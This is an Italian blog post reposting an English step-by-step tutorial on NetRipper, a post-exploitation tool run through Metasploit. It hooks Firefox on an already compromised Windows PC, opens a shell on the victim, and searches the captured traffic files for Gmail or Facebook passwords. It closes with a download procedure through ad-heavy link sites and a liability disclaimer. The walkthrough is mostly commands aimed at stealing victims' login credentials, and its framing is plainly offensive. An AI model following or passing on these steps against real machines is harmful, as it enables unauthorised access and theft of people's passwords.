Salve a tutti,

in rete ho trovato questo fantastico articolo che spiega in poche mosse come intercettare il traffico dati all’interno dei browser e intercettare quindi le password inserite nei form di login.

NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.

Open your kali Linux terminal and type the following command

https://github.com/NytroRST/NetRipper.git

0

Now install the netripper in kali linux step by step process is given below.

  • cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
  • mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
  • g++ -Wall netripper.cpp -o netripper
  • cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
  • cd ../Release
  • cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

1

Now Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Now bypass the UAC visit

Bypass UAC Protection of Remote Windows PC in Memory Injection

Now search netripper

type use post/windows/gather/netripper

msf exploit (netripper)>set verbose true

msf exploit (netripper)>set processnames firefox.exe

msf exploit (netripper)>set session 2

msf exploit (netripper)>exploit

2

Now it will automatically create a NetRripper folder in the target pc on following location

C:\Users\RAJ\AppData\Local\Temp\NetRipper

You have access to the victims PC. Use “Sessions” and the Session number to connect to the session. And Now Type “sessions –id ID“and type shell to get command prompt of victim pc.

5

The captured data is saved by default in TEMP (e.g. C:\Users\RAJ\AppData\Local\Temp\NetRipper).

Now goto the above path by using the command.

C:\windows\system32>cd C:\Users\RAJ\AppData\Local\Temp\NetRipper

Now type Dir command and it will show the list of text files.

In our example, the output file named 1004_firefox.exe_PR_Write.txt may contain the password.

6

We can read that text file from command line using type command.

Type 1004_firefox_.exe_PR_Write.txt

7

Now press ctrl +shift+ f it will open find open & type &pass.

8

Now you can find the password of gmail or facebook as shown below.

9



PROCEDURA PER IL DOWNLOAD

1. Clicchiamo su DOWNLOAD e si aprirà una nuova pagina con un contatore di secondi.

2.Attendiamo i 5 secondi e clicchiamo su "AVANTI" come nella foto.

NOTE: non accettare o consentire MAI le notifiche dai siti ads e non installate mai eventuali eseguibili che potrebbero scaricare! Nitente di preoccupante, sono solo delle pubblicità

3.Eventualmente si atterri sul sito keeplinks.co, basta risolvere il captcha e procedere con la copia del link per il download del contenuto.

3.1. Il/I link per il download li troverete all'interno del box LIVE LINKS, chiudete ogni ads che vi si presenterà davanti


VI RICORDO CHE È TUTTO A SCOPO ILLUSTRATIVO.

NON MI ASSUMO NESSUNA RESPONSABILITÀ NELL’ USO CHE NE FARETE.

IO E I MIEI TUTORIAL NON NE SIAMO RESPONSABILI.

UTILIZZARE SOFTWARE CONTRAFFATTO E' UN REATO.

Licenza Creative Commons
Quest'opera è distribuita con Licenza Creative Commons Attribuzione - Non commerciale - Condividi allo stesso modo 4.0 Internazionale.

Ti è piaciuto il mio articolo? Ti piacerebbe offrirmi un caffè? Con PayPal è facile


Oppure tramite la piattaforma BMC

Offrimi un CaffèOffrimi un Caffè